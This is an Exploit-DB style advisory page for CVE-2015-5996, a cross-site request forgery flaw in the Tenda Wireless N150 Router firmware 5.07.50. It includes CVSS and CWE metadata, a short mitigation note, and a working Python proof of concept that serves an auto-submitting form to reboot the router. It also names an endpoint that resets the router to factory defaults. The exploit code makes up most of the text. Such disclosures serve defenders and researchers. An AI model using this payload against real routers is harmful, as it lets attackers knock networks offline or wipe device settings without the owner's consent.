Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)

vendor:

Wireless N150 Router

by:

Nathu Nandwani

8.8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Wireless N150 Router

Affected Version From: 5.07.50

Affected Version To: 5.07.50

Patch Exists: YES

Related CWE: CVE-2015-5996

CPE: h:tenda:wireless_n150_router

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Tenda Wireless N150 Router 5.07.50 – Cross-Site Request Forgery (Reboot Router)

The router is vulnerable to a cross-site request forgery attacker. If an administrator is currently logged in and visits a remote webpage containing forms existing in the router's firmware, a request can be forged to modify existing settings or even set the router to its default state. These are two examples that can work in the proof of concept: /goform/SysToolReboot - Reboot the router /goform/SysToolRestoreSet - Set the router to default settings

Mitigation:

Administrators should ensure that they are not logged in to the router when visiting untrusted websites. Additionally, they should ensure that the router is running the latest version of its firmware.

Source

Exploit-DB raw data:

# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)
# Date: 2018-07-21
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co
# CVE: CVE-2015-5996
#
# Description:
#
# The router is vulnerable to a cross-site request forgery attacker. 
# If an administrator is currently logged in and visits a 
# remote webpage containing forms existing in the router's firmware, 
# a request can be forged to modify existing settings or even 
# set the router to its default state.
#
# These are two examples that can work in the proof of concept: 
# /goform/SysToolReboot - Reboot the router
# /goform/SysToolRestoreSet - Set the router to default settings
#
# Reference: https://www.kb.cert.org/vuls/id/630872

import socket

server_ip = "0.0.0.0"
server_port = 80

router_ip = "192.168.0.1"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)

print "Currently listening at " + server_ip + ":" + str(server_port)        

client, (client_host, client_port) = sock.accept()

print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)

client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
    <body>
        <form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot">
            <input name="CMD" value="SYS_CONF" type="hidden">
            <input name="GO" value="system_reboot.asp" type="hidden">
            <input name="CCMD" value="0" type="hidden">
        </form>
        <script>
            document.getElementById("frmSetup").submit();
        </script>
    </body>
</html>
""")

client.close()
sock.close()